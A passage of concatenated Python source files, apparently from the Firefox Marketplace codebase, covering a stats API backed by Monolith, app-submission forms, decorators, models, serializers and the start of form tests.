log = commonware.log.getLogger('z.stats')
# Map of URL metric name to monolith metric name.
#
# The 'dimensions' key is optional query string arguments with defaults that is
# passed to the monolith client and used in the facet filters. If the default
# is `None`, the dimension is excluded unless specified via the API.
#
# The 'lines' key is optional and used for multi-line charts. The format is:
# {'<name>': {'<dimension-key>': '<dimension-value>'}}
# where <name> is what's returned in the JSON output and the dimension
# key/value is what's sent to Monolith similar to the 'dimensions' above.
#
# The 'coerce' key is optional and used to coerce data types returned from
# monolith to other types. Provide the name of the key in the data you want to
# coerce with a callback for how you want the data coerced. E.g.:
# {'count': str}
lines = lambda name, vals: dict((val, {name: val}) for val in vals)
STATS = {
'apps_added_by_package': {
'metric': 'apps_added_package_count',
'dimensions': {'region': 'us'},
'lines': lines('package_type', amo.ADDON_WEBAPP_TYPES.values()),
},
'apps_added_by_premium': {
'metric': 'apps_added_premium_count',
'dimensions': {'region': 'us'},
'lines': lines('premium_type', amo.ADDON_PREMIUM_API.values()),
},
'apps_available_by_package': {
'metric': 'apps_available_package_count',
'dimensions': {'region': 'us'},
'lines': lines('package_type', amo.ADDON_WEBAPP_TYPES.values()),
},
'apps_available_by_premium': {
'metric': 'apps_available_premium_count',
'dimensions': {'region': 'us'},
'lines': lines('premium_type', amo.ADDON_PREMIUM_API.values()),
},
'apps_installed': {
'metric': 'app_installs',
'dimensions': {'region': None},
},
'total_developers': {
'metric': 'total_dev_count',
},
'total_visits': {
'metric': 'visits',
},
'ratings': {
'metric': 'apps_ratings',
},
'abuse_reports': {
'metric': 'apps_abuse_reports',
},
'revenue': {
'metric': 'gross_revenue',
# Counts are floats. Let's convert them to strings with 2 decimals.
'coerce': {'count': lambda d: '{0:.2f}'.format(d)},
},
}
APP_STATS = {
'installs': {
'metric': 'app_installs',
'dimensions': {'region': None},
},
'visits': {
'metric': 'app_visits',
},
'ratings': {
'metric': 'apps_ratings',
},
'average_rating': {
'metric': 'apps_average_rating',
},
'abuse_reports': {
'metric': 'apps_abuse_reports',
},
'revenue': {
'metric': 'gross_revenue',
# Counts are floats. Let's convert them to strings with 2 decimals.
'coerce': {'count': lambda d: '{0:.2f}'.format(d)},
},
}
# The total API will iterate over each key and return statistical totals
# information on them all.
STATS_TOTAL = {
'installs': {
'metric': 'app_installs',
},
'ratings': {
'metric': 'apps_ratings',
},
'abuse_reports': {
'metric': 'apps_abuse_reports',
},
}
APP_STATS_TOTAL = {
'installs': {
'metric': 'app_installs',
},
'ratings': {
'metric': 'apps_ratings',
},
'abuse_reports': {
'metric': 'apps_abuse_reports',
},
}
def _get_monolith_data(stat, start, end, interval, dimensions):
# If stat has a 'lines' attribute, it's a multi-line graph. Do a
# request for each item in 'lines' and compose them in a single
# response.
try:
client = get_monolith_client()
except requests.ConnectionError as e:
log.info('Monolith connection error: {0}'.format(e))
raise ServiceUnavailable
def _coerce(data):
for key, coerce in stat.get('coerce', {}).items():
if data.get(key):
data[key] = coerce(data[key])
return data
try:
data = {}
if 'lines' in stat:
for line_name, line_dimension in stat['lines'].items():
dimensions.update(line_dimension)
data[line_name] = map(_coerce,
client(stat['metric'], start, end,
interval, **dimensions))
else:
data['objects'] = map(_coerce,
client(stat['metric'], start, end, interval,
**dimensions))
except ValueError as e:
# This occurs if monolith doesn't have our metric and we get an
# elasticsearch SearchPhaseExecutionException error.
log.info('Monolith ValueError for metric {0}: {1}'.format(
stat['metric'], e))
raise ParseError('Invalid metric at this time. Try again later.')
return data
class GlobalStats(CORSMixin, APIView):
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
cors_allowed_methods = ['get']
permission_classes = [GroupPermission('Stats', 'View')]
def get(self, request, metric):
if metric not in STATS:
raise http.Http404('No metric by that name.')
stat = STATS[metric]
# Perform form validation.
form = StatsForm(request.GET)
if not form.is_valid():
raise ParseError(dict(form.errors.items()))
qs = form.cleaned_data
dimensions = {}
if 'dimensions' in stat:
for key, default in stat['dimensions'].items():
val = request.GET.get(key, default)
if val is not None:
# Avoid passing kwargs to the monolith client when the
# dimension is None to avoid facet filters being applied.
dimensions[key] = request.GET.get(key, default)
return Response(_get_monolith_data(stat, qs.get('start'),
qs.get('end'), qs.get('interval'),
dimensions))
class AppStats(CORSMixin, SlugOrIdMixin, ListAPIView):
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
cors_allowed_methods = ['get']
permission_classes = [AnyOf(AllowAppOwner,
GroupPermission('Stats', 'View'))]
queryset = Webapp.objects.all()
slug_field = 'app_slug'
def get(self, request, pk, metric):
if metric not in APP_STATS:
raise http.Http404('No metric by that name.')
app = self.get_object()
stat = APP_STATS[metric]
# Perform form validation.
form = StatsForm(request.GET)
if not form.is_valid():
raise ParseError(dict(form.errors.items()))
qs = form.cleaned_data
dimensions = {'app-id': app.id}
if 'dimensions' in stat:
for key, default in stat['dimensions'].items():
val = request.GET.get(key, default)
if val is not None:
# Avoid passing kwargs to the monolith client when the
# dimension is None to avoid facet filters being applied.
dimensions[key] = request.GET.get(key, default)
return Response(_get_monolith_data(stat, qs.get('start'),
qs.get('end'), qs.get('interval'),
dimensions))
class StatsTotalBase(object):
"""
A place for a few helper methods for totals stats API.
"""
def get_client(self):
try:
client = get_monolith_client()
except requests.ConnectionError as e:
log.info('Monolith connection error: {0}'.format(e))
raise ServiceUnavailable
return client
def get_query(self, metric, field, app_id=None):
query = {
'query': {
'match_all': {}
},
'facets': {
metric: {
'statistical': {
'field': field
}
}
},
'size': 0
}
# If this is per-app, add the facet_filter.
if app_id:
query['facets'][metric]['facet_filter'] = {
'term': {
'app-id': app_id
}
}
return query
def process_response(self, resp, data):
for metric, facet in resp.get('facets', {}).items():
count = facet.get('count', 0)
# We filter out facets with count=0 to avoid returning things
# like `'max': u'-Infinity'`.
if count > 0:
for field in ('max', 'mean', 'min', 'std_deviation',
'sum_of_squares', 'total', 'variance'):
value = facet.get(field)
if value is not None:
data[metric][field] = value
class GlobalStatsTotal(CORSMixin, APIView, StatsTotalBase):
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
cors_allowed_methods = ['get']
permission_classes = [GroupPermission('Stats', 'View')]
slug_field = 'app_slug'
def get(self, request):
client = self.get_client()
# Note: We have to do this as separate requests so that if one fails
# the rest can still be returned.
data = {}
for metric, stat in STATS_TOTAL.items():
data[metric] = {}
query = self.get_query(metric, stat['metric'])
try:
resp = client.raw(query)
except ValueError as e:
log.info('Received value error from monolith client: %s' % e)
continue
self.process_response(resp, data)
return Response(data)
class AppStatsTotal(CORSMixin, SlugOrIdMixin, ListAPIView, StatsTotalBase):
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
cors_allowed_methods = ['get']
permission_classes = [AnyOf(AllowAppOwner,
GroupPermission('Stats', 'View'))]
queryset = Webapp.objects.all()
slug_field = 'app_slug'
def get(self, request, pk):
app = self.get_object()
client = self.get_client()
# Note: We have to do this as separate requests so that if one fails
# the rest can still be returned.
data = {}
for metric, stat in APP_STATS_TOTAL.items():
data[metric] = {}
query = self.get_query(metric, stat['metric'], app.id)
try:
resp = client.raw(query)
except ValueError as e:
log.info('Received value error from monolith client: %s' % e)
continue
self.process_response(resp, data)
return Response(data)
class TransactionAPI(CORSMixin, APIView):
"""
API to query by transaction ID.
Note: This is intended for Monolith to be able to associate a Solitude
transaction with an app and price tier amount in USD.
"""
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
cors_allowed_methods = ['get']
permission_classes = [GroupPermission('RevenueStats', 'View')]
def get(self, request, transaction_id):
try:
contrib = (Contribution.objects.select_related('price_tier').
get(transaction_id=transaction_id))
except Contribution.DoesNotExist:
raise http.Http404('No transaction by that ID.')
data = {
'id': transaction_id,
'app_id': contrib.addon_id,
'amount_USD': contrib.price_tier.price,
'type': amo.CONTRIB_TYPES[contrib.type],
}
return Response(data)
########NEW FILE########
__FILENAME__ = decorators
import functools
from django.shortcuts import redirect
def submit_step(outer_step):
"""Wraps the function with a decorator that bounces to the right step."""
def decorator(f):
@functools.wraps(f)
def wrapper(request, *args, **kw):
from mkt.submit.views import _resume
from mkt.submit.models import AppSubmissionChecklist
addon = kw.get('addon', False)
if addon:
try:
step = addon.appsubmissionchecklist.get_next()
except AppSubmissionChecklist.DoesNotExist:
step = None
if step and step != outer_step:
return _resume(addon, step)
return f(request, *args, **kw)
wrapper.submitting = True
return wrapper
return decorator
def read_dev_agreement_required(f):
"""
Decorator that checks if the user has read the dev agreement, redirecting
if not.
"""
def decorator(f):
@functools.wraps(f)
def wrapper(request, *args, **kw):
if not request.amo_user.read_dev_agreement:
return redirect('submit.app')
return f(request, *args, **kw)
return wrapper
return decorator(f)
########NEW FILE########
__FILENAME__ = forms
import datetime
import os
from collections import defaultdict
from django import forms
from django.conf import settings
import basket
import happyforms
import waffle
from tower import ugettext as _, ugettext_lazy as _lazy
import amo
from addons.models import Addon, AddonUpsell, BlacklistedSlug, Webapp
from amo.utils import slug_validator
from apps.users.models import UserNotification
from apps.users.notifications import app_surveys
from editors.models import RereviewQueue
from files.models import FileUpload
from files.utils import parse_addon
from translations.fields import TransField
from translations.forms import TranslationFormMixin
from translations.widgets import TransInput, TransTextarea
from mkt.constants import APP_FEATURES, FREE_PLATFORMS, PAID_PLATFORMS
from mkt.site.forms import AddonChoiceField, APP_PUBLIC_CHOICES
from mkt.webapps.models import AppFeatures
from mkt.prices.models import AddonPremium, Price
from mkt.developers.forms import verify_app_domain
def mark_for_rereview(addon, added_devices, removed_devices):
msg = _(u'Device(s) changed: {0}').format(', '.join(
[_(u'Added {0}').format(unicode(amo.DEVICE_TYPES[d].name))
for d in added_devices] +
[_(u'Removed {0}').format(unicode(amo.DEVICE_TYPES[d].name))
for d in removed_devices]))
RereviewQueue.flag(addon, amo.LOG.REREVIEW_DEVICES_ADDED, msg)
def mark_for_rereview_features_change(addon, added_features, removed_features):
# L10n: {0} is the list of requirements changes.
msg = _(u'Requirements changed: {0}').format(', '.join(
[_(u'Added {0}').format(f) for f in added_features] +
[_(u'Removed {0}').format(f) for f in removed_features]))
RereviewQueue.flag(addon, amo.LOG.REREVIEW_FEATURES_CHANGED, msg)
class DeviceTypeForm(happyforms.Form):
ERRORS = {
'both': _lazy(u'Cannot be free and paid.'),
'none': _lazy(u'Please select a device.'),
'packaged': _lazy(u'Packaged apps are not yet supported for those '
u'platforms.'),
}
free_platforms = forms.MultipleChoiceField(
choices=FREE_PLATFORMS(), required=False)
paid_platforms = forms.MultipleChoiceField(
choices=PAID_PLATFORMS(), required=False)
def save(self, addon, is_paid):
data = self.cleaned_data[
'paid_platforms' if is_paid else 'free_platforms']
submitted_data = self.get_devices(t.split('-', 1)[1] for t in data)
new_types = set(dev.id for dev in submitted_data)
old_types = set(amo.DEVICE_TYPES[x.id].id for x in addon.device_types)
added_devices = new_types - old_types
removed_devices = old_types - new_types
for d in added_devices:
addon.addondevicetype_set.create(device_type=d)
for d in removed_devices:
addon.addondevicetype_set.filter(device_type=d).delete()
# Send app to re-review queue if public and new devices are added.
if added_devices and addon.status in amo.WEBAPPS_APPROVED_STATUSES:
mark_for_rereview(addon, added_devices, removed_devices)
def _add_error(self, msg):
self._errors['free_platforms'] = self._errors['paid_platforms'] = (
self.ERRORS[msg])
def _get_combined(self):
devices = (self.cleaned_data.get('free_platforms', []) +
self.cleaned_data.get('paid_platforms', []))
return set(d.split('-', 1)[1] for d in devices)
def _set_packaged_errors(self):
"""Add packaged-app submission errors for incompatible platforms."""
devices = self._get_combined()
bad_android = (
not waffle.flag_is_active(self.request, 'android-packaged') and
('android-mobile' in devices or 'android-tablet' in devices)
)
bad_desktop = (
not waffle.flag_is_active(self.request, 'desktop-packaged') and
'desktop' in devices
)
if bad_android or bad_desktop:
self._errors['free_platforms'] = self._errors['paid_platforms'] = (
self.ERRORS['packaged'])
def clean(self):
data = self.cleaned_data
paid = data.get('paid_platforms', [])
free = data.get('free_platforms', [])
# Check that they didn't select both.
if free and paid:
self._add_error('both')
return data
# Check that they selected one.
if not free and not paid:
self._add_error('none')
return data
return super(DeviceTypeForm, self).clean()
def get_devices(self, source=None):
"""Returns a device based on the requested free or paid."""
if source is None:
source = self._get_combined()
platforms = {'firefoxos': amo.DEVICE_GAIA,
'desktop': amo.DEVICE_DESKTOP,
'android-mobile': amo.DEVICE_MOBILE,
'android-tablet': amo.DEVICE_TABLET}
return map(platforms.get, source)
def is_paid(self):
return bool(self.cleaned_data.get('paid_platforms', False))
def get_paid(self):
"""Returns the premium type. Should not be used if the form is used to
modify an existing app.
"""
return amo.ADDON_PREMIUM if self.is_paid() else amo.ADDON_FREE
class DevAgreementForm(happyforms.Form):
read_dev_agreement = forms.BooleanField(label=_lazy(u'Agree and Continue'),
widget=forms.HiddenInput)
newsletter = forms.BooleanField(required=False, label=app_surveys.label,
widget=forms.CheckboxInput)
def __init__(self, *args, **kw):
self.instance = kw.pop('instance')
self.request = kw.pop('request')
super(DevAgreementForm, self).__init__(*args, **kw)
def save(self):
self.instance.read_dev_agreement = datetime.datetime.now()
self.instance.save()
if self.cleaned_data.get('newsletter'):
UserNotification.update_or_create(user=self.instance,
notification_id=app_surveys.id, update={'enabled': True})
basket.subscribe(self.instance.email,
'app-dev',
format='H',
country=self.request.REGION.slug,
lang=self.request.LANG,
source_url=os.path.join(settings.SITE_URL,
'developers/submit'))
class NewWebappVersionForm(happyforms.Form):
upload_error = _lazy(u'There was an error with your upload. '
u'Please try again.')
upload = forms.ModelChoiceField(widget=forms.HiddenInput,
queryset=FileUpload.objects.filter(valid=True),
error_messages={'invalid_choice': upload_error})
def __init__(self, *args, **kw):
request = kw.pop('request', None)
self.addon = kw.pop('addon', None)
self._is_packaged = kw.pop('is_packaged', False)
super(NewWebappVersionForm, self).__init__(*args, **kw)
if (not waffle.flag_is_active(request, 'allow-b2g-paid-submission')
and 'paid_platforms' in self.fields):
del self.fields['paid_platforms']
def clean(self):
data = self.cleaned_data
if 'upload' not in self.cleaned_data:
self._errors['upload'] = self.upload_error
return
if self.is_packaged():
# Now run the packaged app check, done in clean, because
# clean_packaged needs to be processed first.
try:
pkg = parse_addon(data['upload'], self.addon)
except forms.ValidationError, e:
self._errors['upload'] = self.error_class(e.messages)
return
ver = pkg.get('version')
if (ver and self.addon and
self.addon.versions.filter(version=ver).exists()):
self._errors['upload'] = _(u'Version %s already exists') % ver
return
origin = pkg.get('origin')
if origin:
try:
origin = verify_app_domain(origin, packaged=True,
exclude=self.addon)
except forms.ValidationError, e:
self._errors['upload'] = self.error_class(e.messages)
return
if origin:
data['origin'] = origin
else:
# Throw an error if this is a dupe.
# (JS sets manifest as `upload.name`.)
try:
verify_app_domain(data['upload'].name)
except forms.ValidationError, e:
self._errors['upload'] = self.error_class(e.messages)
return
return data
def is_packaged(self):
return self._is_packaged
class NewWebappForm(DeviceTypeForm, NewWebappVersionForm):
upload = forms.ModelChoiceField(widget=forms.HiddenInput,
queryset=FileUpload.objects.filter(valid=True),
error_messages={'invalid_choice': _lazy(
u'There was an error with your upload. Please try again.')})
packaged = forms.BooleanField(required=False)
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request', None)
super(NewWebappForm, self).__init__(*args, **kwargs)
if 'paid_platforms' in self.fields:
self.fields['paid_platforms'].choices = PAID_PLATFORMS(
self.request)
def _add_error(self, msg):
self._errors['free_platforms'] = self._errors['paid_platforms'] = (
self.ERRORS[msg])
def clean(self):
data = super(NewWebappForm, self).clean()
if not data:
return
if self.is_packaged():
self._set_packaged_errors()
if self._errors.get('free_platforms'):
return
return data
def is_packaged(self):
return self._is_packaged or self.cleaned_data.get('packaged', False)
class UpsellForm(happyforms.Form):
price = forms.ModelChoiceField(queryset=Price.objects.active(),
label=_lazy(u'App Price'),
empty_label=None,
required=True)
make_public = forms.TypedChoiceField(choices=APP_PUBLIC_CHOICES,
widget=forms.RadioSelect(),
label=_lazy(u'When should your app be '
'made available for sale?'),
coerce=int,
required=False)
free = AddonChoiceField(queryset=Addon.objects.none(),
required=False, empty_label='',
# L10n: "App" is a paid version of this app. "from" is this app.
label=_lazy(u'App to upgrade from'),
widget=forms.Select())
def __init__(self, *args, **kw):
self.extra = kw.pop('extra')
self.request = kw.pop('request')
self.addon = self.extra['addon']
if 'initial' not in kw:
kw['initial'] = {}
kw['initial']['make_public'] = amo.PUBLIC_IMMEDIATELY
if self.addon.premium:
kw['initial']['price'] = self.addon.premium.price
super(UpsellForm, self).__init__(*args, **kw)
self.fields['free'].queryset = (self.extra['amo_user'].addons
.exclude(pk=self.addon.pk)
.filter(premium_type__in=amo.ADDON_FREES,
status__in=amo.VALID_STATUSES,
type=self.addon.type))
if len(self.fields['price'].choices) > 1:
# Tier 0 (Free) should not be the default selection.
self.initial['price'] = (Price.objects.active()
.exclude(price='0.00')[0])
def clean_make_public(self):
return (amo.PUBLIC_WAIT if self.cleaned_data.get('make_public')
else None)
def save(self):
if 'price' in self.cleaned_data:
premium = self.addon.premium
if not premium:
premium = AddonPremium()
premium.addon = self.addon
premium.price = self.cleaned_data['price']
premium.save()
upsell = self.addon.upsold
if self.cleaned_data['free']:
# Check if this app was already a premium version for another app.
if upsell and upsell.free != self.cleaned_data['free']:
upsell.delete()
if not upsell:
upsell = AddonUpsell(premium=self.addon)
upsell.free = self.cleaned_data['free']
upsell.save()
elif upsell:
upsell.delete()
self.addon.update(make_public=self.cleaned_data['make_public'])
class AppDetailsBasicForm(TranslationFormMixin, happyforms.ModelForm):
"""Form for "Details" submission step."""
app_slug = forms.CharField(max_length=30,
widget=forms.TextInput(attrs={'class': 'm'}))
description = TransField(required=True,
label=_lazy(u'Description:'),
help_text=_lazy(u'This description will appear on the details page.'),
widget=TransTextarea(attrs={'rows': 4}))
privacy_policy = TransField(widget=TransTextarea(attrs={'rows': 6}),
label=_lazy(u'Privacy Policy:'),
help_text=_lazy(u"A privacy policy that explains what "
"data is transmitted from a user's computer and how "
"it is used is required."))
homepage = TransField.adapt(forms.URLField)(required=False,
label=_lazy(u'Homepage:'),
help_text=_lazy(u'If your app has another homepage, enter its address '
'here.'),
widget=TransInput(attrs={'class': 'full'}))
support_url = TransField.adapt(forms.URLField)(required=False,
label=_lazy(u'Support Website:'),
help_text=_lazy(u'If your app has a support website or forum, enter '
'its address here.'),
widget=TransInput(attrs={'class': 'full'}))
support_email = TransField.adapt(forms.EmailField)(
label=_lazy(u'Support Email:'),
help_text=_lazy(u'This email address will be listed publicly on the '
u'Marketplace and used by end users to contact you '
u'with support issues. This email address will be '
u'listed publicly on your app details page.'),
widget=TransInput(attrs={'class': 'full'}))
flash = forms.TypedChoiceField(required=False,
coerce=lambda x: bool(int(x)),
label=_lazy(u'Does your app require Flash support?'),
initial=0,
choices=(
(1, _lazy(u'Yes')),
(0, _lazy(u'No')),
),
widget=forms.RadioSelect)
publish = forms.BooleanField(required=False, initial=1,
label=_lazy(u"Publish my app in the Firefox Marketplace as soon as "
"it's reviewed."),
help_text=_lazy(u"If selected your app will be published immediately "
"following its approval by reviewers. If you don't "
"select this option you will be notified via email "
"about your app's approval and you will need to log "
"in and manually publish it."))
class Meta:
model = Addon
fields = ('app_slug', 'description', 'privacy_policy', 'homepage',
'support_url', 'support_email')
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(AppDetailsBasicForm, self).__init__(*args, **kwargs)
def clean_app_slug(self):
slug = self.cleaned_data['app_slug']
slug_validator(slug, lower=False)
if slug != self.instance.app_slug:
if Webapp.objects.filter(app_slug=slug).exists():
raise forms.ValidationError(
_('This slug is already in use. Please choose another.'))
if BlacklistedSlug.blocked(slug):
raise forms.ValidationError(
_('The slug cannot be "%s". Please choose another.'
% slug))
return slug.lower()
def save(self, *args, **kw):
self.instance = super(AppDetailsBasicForm, self).save(commit=True)
uses_flash = self.cleaned_data.get('flash')
af = self.instance.get_latest_file()
if af is not None:
af.update(uses_flash=bool(uses_flash))
return self.instance
class AppFeaturesForm(happyforms.ModelForm):
class Meta:
exclude = ['version']
model = AppFeatures
def __init__(self, *args, **kwargs):
super(AppFeaturesForm, self).__init__(*args, **kwargs)
if self.instance:
self.initial_features = sorted(self.instance.to_keys())
else:
self.initial_features = None
def all_fields(self):
"""
Degeneratorizes self.__iter__(), the list of fields on the form. This
allows further manipulation of fields: to display a subset of fields or
order them in a specific way.
"""
return [f for f in self.__iter__()]
def required_api_fields(self):
"""
All fields on the form, alphabetically sorted by help text.
"""
return sorted(self.all_fields(), key=lambda x: x.help_text)
def get_tooltip(self, field):
field_id = field.name.split('_', 1)[1].upper()
return (unicode(APP_FEATURES[field_id].get('description') or '') if
field_id in APP_FEATURES else None)
def _changed_features(self):
old_features = defaultdict.fromkeys(self.initial_features, True)
old_features = set(unicode(f) for f
in AppFeatures(**old_features).to_list())
new_features = set(unicode(f) for f in self.instance.to_list())
added_features = new_features - old_features
removed_features = old_features - new_features
return added_features, removed_features
def save(self, *args, **kwargs):
mark_for_rereview = kwargs.pop('mark_for_rereview', True)
addon = self.instance.version.addon
rval = super(AppFeaturesForm, self).save(*args, **kwargs)
if (self.instance and mark_for_rereview and
addon.status in amo.WEBAPPS_APPROVED_STATUSES and
sorted(self.instance.to_keys()) != self.initial_features):
added_features, removed_features = self._changed_features()
mark_for_rereview_features_change(addon,
added_features,
removed_features)
return rval
########NEW FILE########
__FILENAME__ = helpers
from jingo import register, env
import jinja2
from tower import ugettext as _
import waffle
import mkt
from mkt.submit.models import AppSubmissionChecklist
def del_by_key(data, delete):
"""Delete a tuple from a list of tuples based on its first item."""
data = list(data)
for idx, item in enumerate(data):
if ((isinstance(item[0], basestring) and item[0] == delete) or
(isinstance(item[0], (list, tuple)) and item[0] in delete)):
del data[idx]
return data
@register.function
def progress(request, addon, step):
if addon and not addon.is_webapp():
return NotImplementedError
steps = list(mkt.APP_STEPS)
if waffle.switch_is_active('iarc'):
# TODO: uncomment next_steps to mkt/constants/submit.
steps[3] = ('next_steps', _('Next Steps'))
completed = []
# TODO: Hide "Developer Account" step if user already read Dev Agreement.
#if request.amo_user.read_dev_agreement:
# steps = del_by_key(steps, 'terms')
if addon:
try:
completed = addon.appsubmissionchecklist.get_completed()
except AppSubmissionChecklist.DoesNotExist:
pass
# We don't yet have a checklist yet if we just read the Dev Agreement.
if not completed and step and step != 'terms':
completed = ['terms']
c = dict(steps=steps, current=step, completed=completed)
t = env.get_template('submit/helpers/progress.html').render(c)
return jinja2.Markup(t)
########NEW FILE########
__FILENAME__ = models
from django.db import models
import amo.models
import mkt
class AppSubmissionChecklist(amo.models.ModelBase):
addon = models.OneToOneField('addons.Addon')
terms = models.BooleanField(default=False)
manifest = models.BooleanField(default=False)
details = models.BooleanField(default=False)
class Meta:
db_table = 'submission_checklist_apps'
def get_completed(self):
"""Return a list of completed submission steps."""
completed = []
for step, label in mkt.APP_STEPS:
if getattr(self, step, False):
completed.append(step)
return completed
def get_next(self):
"""Return the next step."""
# Look through all the steps as defined in order and
# see for each of the steps if they are completed or not.
#
# We don't care about done, plus there's no column for it.
for step, label in mkt.APP_STEPS[:-1]:
if not getattr(self, step, False):
return step
########NEW FILE########
__FILENAME__ = serializers
import json
from django.core.urlresolvers import reverse
from rest_framework import serializers
import amo
from addons.models import Preview
from files.models import FileUpload
from mkt.api.fields import ReverseChoiceField
from mkt.webapps.models import Webapp
class AppStatusSerializer(serializers.ModelSerializer):
status = ReverseChoiceField(choices_dict=amo.STATUS_CHOICES_API,
required=False)
disabled_by_user = serializers.BooleanField(required=False)
allowed_statuses = {
# You can push to the pending queue.
amo.STATUS_NULL: amo.STATUS_PENDING,
# You can push to public if you've been reviewed.
amo.STATUS_PUBLIC_WAITING: amo.STATUS_PUBLIC,
}
class Meta:
model = Webapp
fields = ('status', 'disabled_by_user')
def validate_status(self, attrs, source):
if not self.object:
raise serializers.ValidationError(u'Error getting app.')
if not source in attrs:
return attrs
# An incomplete app's status can not be changed.
if not self.object.is_fully_complete():
raise serializers.ValidationError(
self.object.completion_error_msgs())
# Only some specific changes are possible depending on the app current
# status.
if (self.object.status not in self.allowed_statuses or
attrs[source] != self.allowed_statuses[self.object.status]):
raise serializers.ValidationError(
'App status can not be changed to the one you specified.')
return attrs
class FileUploadSerializer(serializers.ModelSerializer):
id = serializers.CharField(source='pk', read_only=True)
processed = serializers.BooleanField(read_only=True)
class Meta:
model = FileUpload
fields = ('id', 'processed', 'valid', 'validation')
def transform_validation(self, obj, value):
return json.loads(value) if value else value
class PreviewSerializer(serializers.ModelSerializer):
filetype = serializers.CharField()
id = serializers.IntegerField(source='pk')
image_url = serializers.CharField(read_only=True)
resource_uri = serializers.SerializerMethodField('get_resource_uri')
thumbnail_url = serializers.CharField(read_only=True)
class Meta:
model = Preview
fields = ['filetype', 'image_url', 'id', 'resource_uri',
'thumbnail_url']
def get_resource_uri(self, request):
if self.object is None:
return None
return reverse('app-preview-detail', kwargs={'pk': self.object.pk})
class SimplePreviewSerializer(PreviewSerializer):
class Meta(PreviewSerializer.Meta):
fields = ['image_url', 'thumbnail_url']
########NEW FILE########
__FILENAME__ = test_forms
from django.forms.fields import BooleanField
from django.utils.translation import ugettext_lazy as _
import mock
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo
import amo.tests
from devhub.models import AppLog
from editors.models import RereviewQueue
from files.models import FileUpload
from users.models import UserProfile
from mkt.constants.features import APP_FEATURES
from mkt.site.fixtures import fixture
from mkt.submit import forms
from mkt.webapps.models import AppFeatures, Webapp
class TestNewWebappForm(amo.tests.TestCase):
def setUp(self):
self.request = RequestFactory().get('/')
self.file = FileUpload.objects.create(valid=True)
def test_not_free_or_paid(self):
form = forms.NewWebappForm({})
assert not form.is_valid()
eq_(form.ERRORS['none'], form.errors['free_platforms'])
eq_(form.ERRORS['none'], form.errors['paid_platforms'])
def test_not_paid(self):
form = forms.NewWebappForm({'paid_platforms': ['paid-firefoxos']})
assert not form.is_valid()
eq_(form.ERRORS['none'], form.errors['free_platforms'])
eq_(form.ERRORS['none'], form.errors['paid_platforms'])
def test_paid(self):
self.create_flag('allow-b2g-paid-submission')
form = forms.NewWebappForm({'paid_platforms': ['paid-firefoxos'],
'upload': self.file.uuid},
request=self.request)
assert form.is_valid()
eq_(form.get_paid(), amo.ADDON_PREMIUM)
def test_free(self):
self.create_flag('allow-b2g-paid-submission')
form = forms.NewWebappForm({'free_platforms': ['free-firefoxos'],
'upload': self.file.uuid})
assert form.is_valid()
eq_(form.get_paid(), amo.ADDON_FREE)
def test_platform(self):
self.create_flag('allow-b2g-paid-submission')
mappings = (
({'free_platforms': ['free-firefoxos']}, [amo.DEVICE_GAIA]),
({'paid_platforms': ['paid-firefoxos']}, [amo.DEVICE_GAIA]),
({'free_platforms': ['free-firefoxos',
'free-android-mobile']},
[amo.DEVICE_GAIA, amo.DEVICE_MOBILE]),
({'free_platforms': ['free-android-mobile',
'free-android-tablet']},
[amo.DEVICE_MOBILE, amo.DEVICE_TABLET]),
)
for data, res in mappings:
data['upload'] = self.file.uuid
form = forms.NewWebappForm(data)
assert form.is_valid(), form.errors
self.assertSetEqual(res, form.get_devices())
def test_both(self):
self.create_flag('allow-b2g-paid-submission')
form = forms.NewWebappForm({'paid_platforms': ['paid-firefoxos'],
'free_platforms': ['free-firefoxos']},
request=self.request)
assert not form.is_valid()
eq_(form.ERRORS['both'], form.errors['free_platforms'])
eq_(form.ERRORS['both'], form.errors['paid_platforms'])
def test_multiple(self):
form = forms.NewWebappForm({'free_platforms': ['free-firefoxos',
'free-desktop'],
'upload': self.file.uuid})
assert form.is_valid()
def test_not_packaged(self):
form = forms.NewWebappForm({'free_platforms': ['free-firefoxos'],
'upload': self.file.uuid})
assert form.is_valid(), form.errors
assert not form.is_packaged()
def test_not_packaged_allowed(self):
form = forms.NewWebappForm({'free_platforms': ['free-firefoxos'],
'upload': self.file.uuid})
assert form.is_valid(), form.errors
assert not form.is_packaged()
@mock.patch('mkt.submit.forms.parse_addon',
lambda *args: {'version': None})
def test_packaged_disallowed_behind_flag(self):
for device in ('free-desktop',
'free-android-mobile',
'free-android-tablet'):
form = forms.NewWebappForm({'free_platforms': [device],
'upload': self.file.uuid,
'packaged': True})
assert not form.is_valid(), form.errors
eq_(form.ERRORS['packaged'], form.errors['paid_platforms'])
@mock.patch('mkt.submit.forms.parse_addon',
lambda *args: {'version': None})
def test_packaged_allowed_everywhere(self):
self.create_flag('android-packaged')
self.create_flag('desktop-packaged')
for device in ('free-firefoxos',
'free-desktop',
'free-android-tablet',
'free-android-mobile'):
form = forms.NewWebappForm({'free_platforms': [device],
'upload': self.file.uuid,
'packaged': True},
request=self.request)
assert form.is_valid(), form.errors
assert form.is_packaged()
class TestNewWebappVersionForm(amo.tests.TestCase):
def setUp(self):
self.request = RequestFactory().get('/')
self.file = FileUpload.objects.create(valid=True)
def test_no_upload(self):
form = forms.NewWebappVersionForm(request=self.request,
is_packaged=True)
assert not form.is_valid(), form.errors
@mock.patch('mkt.submit.forms.parse_addon',
lambda *args: {"origin": "app://hy.fr"})
@mock.patch('mkt.submit.forms.verify_app_domain')
def test_verify_app_domain_called(self, _verify):
self.create_switch('webapps-unique-by-domain')
form = forms.NewWebappVersionForm({'upload': self.file.uuid},
request=self.request,
is_packaged=True)
assert form.is_valid(), form.errors
assert _verify.called
@mock.patch('mkt.submit.forms.parse_addon',
lambda *args: {"origin": "app://hy.fr"})
def test_verify_app_domain_exclude_same(self):
app = amo.tests.app_factory(app_domain='app://hy.fr')
form = forms.NewWebappVersionForm(
{'upload': self.file.uuid}, request=self.request, is_packaged=True,
addon=app)
assert form.is_valid(), form.errors
@mock.patch('mkt.submit.forms.parse_addon',
lambda *args: {"origin": "app://hy.fr"})
def test_verify_app_domain_exclude_different(self):
app = amo.tests.app_factory(app_domain='app://yo.lo')
